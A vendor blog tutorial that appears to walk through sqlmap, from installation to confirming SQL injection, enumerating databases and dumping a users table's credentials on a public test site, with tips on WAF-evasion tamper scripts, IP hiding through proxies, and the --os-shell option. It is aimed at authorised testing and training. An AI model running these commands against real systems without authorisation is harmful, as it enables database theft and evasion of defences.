SQL Injection Scanners — Understand Your Results and What to

Secably Research
Jul 10, 2026
10 min read
Security Tools
Injection Scanner Sql Tools Tutorial
SQL Injection Scanners — Understand Your Results and What to
SQL Injection Scanners — Understand Your Results and What to
A sql injection vulnerability scanner automates the detection and exploitation of SQL injection flaws in web applications. Security engineers use these scanners during penetration tests, bug bounty assessments, and routine vulnerability scanning to identify database exposure risks. This tool works by injecting malicious SQL code into input fields, parameters, and HTTP headers to observe database responses, revealing whether an application is vulnerable to unauthorized data access or manipulation.

Using a SQL Injection Vulnerability Scanner: Step-by-Step with sqlmap

The open-source tool `sqlmap` is a widely used sql injection vulnerability scanner. It supports various injection techniques, including boolean-based blind, error-based, union query, stacked queries, and time-based blind.

Installation

Install `sqlmap` using `pip` or by cloning its GitHub repository. Python 3 is required.
pip install sqlmap
Alternatively, clone the repository:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
python sqlmap.py --version

Basic Scan Against a Target URL

Start by scanning a target URL. Identify a parameter in the URL that interacts with a database. For demonstration, we will use a hypothetical vulnerable URL.
python sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=1"
Expected output:
        _
       __H__
  ___  ["]___ ___
 |_ -| -O-- | . _|
  |  |   O   |  _|
  |[]| -O-- |[]|
  --

sqlmap/1.x#dev (rXXXX)
[XX:XX:XX] [INFO] starting @XX:XX:XX/XXXX-XX-XX
[XX:XX:XX] [INFO] HTTP request to 'http://testphp.vulnweb.com/listproducts.php?cat=1'
[XX:XX:XX] [INFO] testing connection to the target URL
[XX:XX:XX] [INFO] heuristics identified web server as 'Apache'
[XX:XX:XX] [INFO] the back-end DBMS is 'MySQL'
[XX:XX:XX] [INFO] testing for SQL injection on parameter 'cat'
[XX:XX:XX] [INFO] 'cat' parameter is vulnerable. Do you want to keep testing others (if any)? [y/N] N
[XX:XX:XX] [INFO] 'cat' parameter is vulnerable to 'boolean-based blind - GET (original)'
[XX:XX:XX] [INFO] 'cat' parameter is vulnerable to 'error-based - GET (original)'
[XX:XX:XX] [INFO] 'cat' parameter is vulnerable to 'union query - GET (original)'
[XX:XX:XX] [INFO] 'cat' parameter is vulnerable to 'stacked queries - GET (original)'
[XX:XX:XX] [INFO] 'cat' parameter is vulnerable to 'time-based blind - GET (original)'
[XX:XX:XX] [INFO] the back-end DBMS is 'MySQL >= 5.0.0'
[XX:XX:XX] [INFO] fetched data: MySQL
[XX:XX:XX] [INFO] ending @XX:XX:XX/XXXX-XX-XX
This output confirms the `cat` parameter is vulnerable and identifies the backend database as MySQL.

Identifying Databases

Once a vulnerability is confirmed, list available databases using the `--dbs` option.
python sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs
Expected output:
[XX:XX:XX] [INFO] fetching databases
[XX:XX:XX] [INFO] the back-end DBMS is 'MySQL >= 5.0.0'
[XX:XX:XX] [INFO] fetched data: MySQL
available databases [X]:
[*] acuart
[*] information_schema
[*] mysql
[*] web
The tool lists database names, including `information_schema`, a system database, and `acuart`, `mysql`, `web` which are likely application-specific.

Enumerating Tables

Choose a database, for example, `acuart`, and list its tables using `-D acuart --tables`.
python sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --tables
Expected output:
[XX:XX:XX] [INFO] fetching tables for database 'acuart'
Database: acuart
[X] tables
+------------+
| users      |
| products   |
| categories |
| guestbook  |
+------------+
This reveals tables like `users`, `products`, `categories`, and `guestbook`. The `users` table is often of interest.

Dumping Data from Tables and Columns

To retrieve data, specify the database, table, and use the `--dump` option. You can also specify columns with `-C`. To dump all columns from the `users` table in the `acuart` database:
python sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users --dump
Expected output (truncated for brevity):
[XX:XX:XX] [INFO] dumping table 'users' from database 'acuart'
Database: acuart
Table: users
[X] entries
+----+----------+----------+----------+----------------------------------+
| id | username | email    | pass     | signature                        |
+----+----------+----------+----------+----------------------------------+
| 1  | admin    | ...      | ...      | ...                              |
| 2  | test     | ...      | ...      | ...                              |
+----+----------+----------+----------+----------------------------------+
This command retrieves all entries from the `users` table. If you want specific columns, for example, `username` and `pass`:
python sqlmap.py -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users -C username,pass --dump

Using POST Requests

Many applications use POST requests for form submissions. To scan these, capture the request with a proxy like Burp Suite or OWASP ZAP, save it to a file, and use the `-r` option. Assume `request.txt` contains the following HTTP POST request:
POST /login.php HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: http://testphp.vulnweb.com
Connection: close
Referer: http://testphp.vulnweb.com/login.php
Upgrade-Insecure-Requests: 1

username=test&password=test&submit=Login
Scan this request:
python sqlmap.py -r request.txt --dbs
`sqlmap` automatically identifies injectable parameters in the POST body.

Common Use Cases with Practical Scenarios

Automated Vulnerability Assessment for Developers

Developers can integrate `sqlmap` into their CI/CD pipelines for automated vulnerability checks. Before deploying new code, a pipeline step runs `sqlmap` against a staging environment. If new SQL injection flaws appear, the build breaks, preventing vulnerable code from reaching production. This proactive approach catches issues early.

Penetration Testing Scope Validation

During external penetration tests, security teams use a sql injection vulnerability scanner to quickly validate the scope's susceptibility to SQL injection. For instance, after initial reconnaissance with tools like Secably's free website vulnerability scanner or HTTP security headers checker, a pen tester finds several web applications. They then run `sqlmap` against identified parameters to confirm potential SQL injection points before manually exploiting them, saving time and focusing effort.

Bug Bounty Hunting Initial Reconnaissance

Bug bounty hunters often use `sqlmap` to rapidly scan target applications for common SQL injection patterns. After identifying a target, they might use `sqlmap` to test various GET and POST parameters. Finding an immediate SQL injection allows them to report a high-impact vulnerability quickly, increasing their chances of a bounty. This acts as a first-pass filter before deeper manual analysis.

Regular Security Audits

Organizations conduct regular security audits of their web applications. A sql injection vulnerability scanner forms a core part of their Dynamic Application Security Testing (DAST) strategy. For example, a monthly scan of critical applications ensures ongoing protection against new vulnerabilities or regressions introduced by code changes. Tools like `sqlmap` can be scripted to run against a list of URLs and report findings for review. For broader DAST capabilities and comparisons, consider resources like Acunetix vs Netsparker (Invicti): Which DAST to Choose in 2026.

Troubleshooting Common Issues

"Not Injectable" Results

Sometimes `sqlmap` reports "all tested parameters appear to be not injectable." This does not always mean the application is secure.
  • WAF/IPS Blocking: A Web Application Firewall (WAF) or Intrusion Prevention System (IPS) might be blocking `sqlmap`'s attempts. Use `--tamper` scripts or a proxy.
  • Incorrect Parameter Identification: `sqlmap` might miss parameters. Manually identify all GET/POST parameters, headers, or cookies that could be vulnerable. Use `-p` to specify parameters: `python sqlmap.py -u "target.com/page.php?id=1" -p "id"`
  • Complex Injection Points: Some injections require specific conditions or deeper understanding of the application logic. `sqlmap` might not detect these automatically.
  • Insufficient Privileges: The web user account connecting to the database might have limited privileges, preventing `sqlmap` from enumerating certain data.

Firewall/WAF Blocking

WAFs detect and block known SQL injection patterns. `sqlmap` offers `--tamper` scripts to evade these defenses.
  • Tamper Scripts: Use `--tamper` with scripts like `space2plus.py`, `apostrophemask.py`, `unionalltostacked.py`, or `wafbypass.py`.
python sqlmap.py -u "http://target.com/page.php?id=1" --tamper=space2plus.py,charencode.py --dbs
  • Proxy Usage: Route `sqlmap` traffic through a proxy like Burp Suite or a private network to observe and modify requests, or to hide your IP.
python sqlmap.py -u "http://target.com/page.php?id=1" --proxy="http://127.0.0.1:8080" --dbs
This helps in analyzing WAF responses and crafting custom bypasses.

HTTP Errors (403, 500)

  • 403 Forbidden: Your IP might be blocked by a WAF or rate-limiting system. Use `--random-agent` to rotate user-agents, or `--proxy` with a different IP. Consider using a VPN service like VPNWG for changing your egress IP.
  • 500 Internal Server Error: The injected payload might crash the application or database. Try reducing the `--level` and `--risk` options (e.g., `--level=1 --risk=1`) to use less aggressive payloads. The application might also be poorly coded, making it prone to crashes on unexpected input.

Slow Scans

Scans can take a long time, especially with blind injection techniques.
  • Increase Threads: Use `--threads` to parallelize requests. Be cautious, as too many threads can overload the target or trigger rate limits.
python sqlmap.py -u "http://target.com/page.php?id=1" --dbs --threads=10
  • Target Specific Parameters: If you know which parameter is vulnerable, focus the scan on it using `-p`.
  • Limit Scope: Avoid dumping entire databases initially. Target specific tables or columns.
  • Bandwidth/Latency: Ensure your network connection is stable and has sufficient bandwidth. High latency to the target server slows down time-based blind injections significantly.

Session Management Issues

Applications often use cookies for session management. If the session expires, `sqlmap` might lose its context.
  • Specify Cookies: Use `--cookie` to provide valid session cookies.
python sqlmap.py -u "http://target.com/page.php?id=1" --cookie="PHPSESSID=abcdef1234567890; security=low" --dbs
  • Update Cookies: If cookies change frequently, you might need to update them during the scan or use a proxy to manage them.
  • Authentication: If the target requires authentication, use `--auth` for HTTP Basic/Digest/NTLM authentication or `--auth-file` for more complex schemes.

Pro Tips for Advanced Usage

Tamper Scripts for Evasion

`sqlmap`'s `--tamper` scripts modify payloads to bypass WAFs. Experiment with different scripts based on the detected WAF. For example, `apostrophemask.py` replaces apostrophes with their UTF-8 representation, and `space2comment.py` replaces spaces with comments. Combine multiple scripts for better evasion.
python sqlmap.py -u "http://target.com/page.php?id=1" --tamper="space2comment.py,charencode.py,randomcase.py" --dbs

Custom Headers and Cookies

Many applications rely on specific HTTP headers or cookies. `sqlmap` allows you to specify these using `--headers` and `--cookie`. This is essential for authenticated scans or when specific headers are required for application functionality.
python sqlmap.py -u "http://target.com/page.php?id=1" --headers="X-Forwarded-For: 127.0.0.1" --cookie="sessionid=abc123def456" --dbs

Proxy Usage for Anonymity and Inspection

Using a proxy server with `--proxy` routes `sqlmap`'s traffic through it. This helps maintain anonymity and allows intercepting and inspecting requests with tools like Burp Suite. This is also useful for testing from different geographical locations or bypassing IP-based restrictions.
python sqlmap.py -u "http://target.com/page.php?id=1" --proxy="http://127.0.0.1:8080" --proxy-cred="user:pass" --dbs

Risk and Level Options

`sqlmap` uses `--risk` and `--level` to control the depth and aggressiveness of the tests.
  • `--level` (1-5, default 1): Specifies the number of payload tests. Higher levels test more injection points (e.g., HTTP headers like User-Agent, Referer, Host).
  • `--risk` (1-3, default 1): Specifies the types of payloads to use. Higher risks include payloads that might cause data corruption (e.g., stacked queries).
Start with default values and increase them if no vulnerabilities are found.
python sqlmap.py -u "http://target.com/page.php?id=1" --level=5 --risk=3 --dbs

Batch Mode for Automation

The `--batch` option runs `sqlmap` in non-interactive mode. It automatically answers "yes" to all questions, making it suitable for scripting and CI/CD integration. Combine it with `--forms` to automatically test all forms on a target.
python sqlmap.py -u "http://target.com" --forms --batch --crawl=1 --dbs
This command crawls one level deep, finds forms, and tests them for SQL injection without user interaction.

Integrating with Other Tools

`sqlmap` can integrate with other security tools. For example, you can feed URLs discovered by a web crawler or a subdomain discovery tool into `sqlmap`. Secably's free tools, such as the free website vulnerability scanner or subdomain discovery tool, can help identify potential targets or parameters for `sqlmap`. For example, after discovering subdomains with Secably, you might manually test specific application parameters on those subdomains with `sqlmap`.

Database-Specific Options

If you know the backend database type, specify it with `-D` or `--dbms`. This significantly speeds up the scanning process by avoiding unnecessary tests.
python sqlmap.py -u "http://target.com/page.php?id=1" --dbms=mysql --dbs

Advanced Dumping Techniques

Beyond basic dumping, `sqlmap` offers options like `--dump-all` to retrieve all databases, tables, and columns, `--search` to search for specific database names, table names, or columns across all databases, and `--os-shell` to gain an operating system shell if the database user has sufficient privileges and the backend supports it. For continuous monitoring of your attack surface, including SQL injection vulnerabilities and other risks, Secably offers paid monitoring plans starting at $19/month. These services provide ongoing scanning and alerts, going beyond ad-hoc scans. You can find more details on Secably pricing. For broader attack surface management capabilities, consider Secably.

Check your site for vulnerabilities

Run a free security scan — no signup, results in seconds.

Related Posts

Stronger security starts with visibility.

Scan your website for vulnerabilities and get actionable insights.